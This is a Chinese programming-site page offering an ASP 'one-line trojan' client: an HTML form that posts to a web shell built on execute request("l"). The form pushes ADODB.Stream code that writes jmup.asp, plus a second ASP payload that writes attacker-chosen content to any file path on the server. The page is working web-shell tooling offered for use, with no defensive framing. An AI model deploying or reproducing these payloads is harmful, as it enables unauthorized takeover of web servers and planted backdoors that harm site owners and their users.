代码驿站移动版
频道导航
HTML/Xhtml
CSS
JavaScript
HTML5
PHP教程
ASP.NET
正则表达式
AJAX
ThinkPHP
Yii
MySQL
MariaDB
Oracle
MongoDB
Redis
DedeCMS
PHPCMS
帝国CMS
WordPress
Discuz
其它CMS
Zend Studio
Sublime
Notepad
Dreamweaver
Windows
Linux
Nginx
Apache
IIS
CentOS
Ubuntu
Debian
网站优化
工具资源
PHP源码
ASP.NET源码
其它源码
图标素材
按钮素材
字体素材
DedeCMS模板
帝国CMS模板
PHPCMS模板
WordPress模板
Discuz!模板
单页模板
开发软件下载
服务器软件下载
广告投放
联系我们
版权申明
软件编程
网页前端
移动开发
数据库
服务器
脚本语言
PHP代码
JAVA代码
Python代码
Android代码
当前位置:
主页
>
软件编程
>
ASP代码
>
一句话木马连接客户端
时间:2021-01-09 11:15:38 | 栏目:
ASP代码
| 点击:次
<html><title>一句话木马连接客户端 -- BY 寂寞的刺猬 @ 520000796</title><p align="center">一句话木马(<font color="#0000FF"><%execute request("l")%></font>) 的本地连接客户端 </P> <P><form name="codeform" action="" method=post onsubmit="if (this.userurl.value.length<1){alert('请输入URL地址!');this.userurl.focus();return false}else{this.action=this.userurl.value}"> </P> <P><p>ASP URL:<input style="WIDTH:70%" type="text" name="userurl" value="http://127.0.0.1/date/jmdcw.asp" /> <font color="#FF0000"> 生成asp页名称:</font><textarea name=l cols=100 rows=7 width=36> set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("p") lP.SaveToFile server.mappath("jmup.asp"),2 lP.Close set lP=nothing response.redirect "jmup.asp" </textarea> <font color="#FF0000">上传内容:</font><textarea name=p cols=100 rows=7 width=36><% dim objFSO %><% dim fdata %><% dim objCountFile %><% on error resume next %><% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %><% if Trim(request("syfdpath"))<>"" then %><% fdata = request("cyfddata") %><% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %><% objCountFile.Write fdata %><% if err =0 then %><% response.write "<font color=red>save Success!</font>" %><% else %><% response.write "<font color=red>Save UnSuccess!</font>" %><% end if %><% err.clear %><% end if %><% objCountFile.Close %><% Set objCountFile=Nothing %><% Set objFSO = Nothing %><% Response.write "<form action='' method=post>" %><% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %><% Response.Write "<input type=text name=syfdpath width=32 size=50>" %><% Response.Write "" %><% Response.write "本文件绝对路径" %><% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %><% Response.write "" %><% Response.write "输入马的内容:" %><% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %><% Response.write "<input type=submit value=保存>" %><% Response.write "</form>" %> </textarea><center> <input type="submit" value="提交" /></form></html>
[Ctrl+A 全选 注:
引入外部Js需再刷新一下页面才能执行
]
您可能感兴趣的文章:
asp下过滤非法的SQL字符的函数代码
网站开发防止中文乱码需要了解的codepage的重要性小结
asp程序定义变量比不定义变量速度快一倍
asp数个使用技巧
asp实现生成由数字,大写字母,小写字母指定位数的随机数
相关文章
01-04
asp下sql和access数据库随机取10条记录的代码newid()
01-11
文件的读出 编辑 管理
12-30
asp在iis7报错行号不准问题的解决方法
11-11
再发几个ASP不错的函数
10-09
asp下为什么韩文字后面显示分号?
JQuery
VUE
AngularJS
MSSql
MySQL
MongoDB
Redis
Linux
Tomcat
Nginx
网站首页
广告投放
联系我们
版权申明
联系站长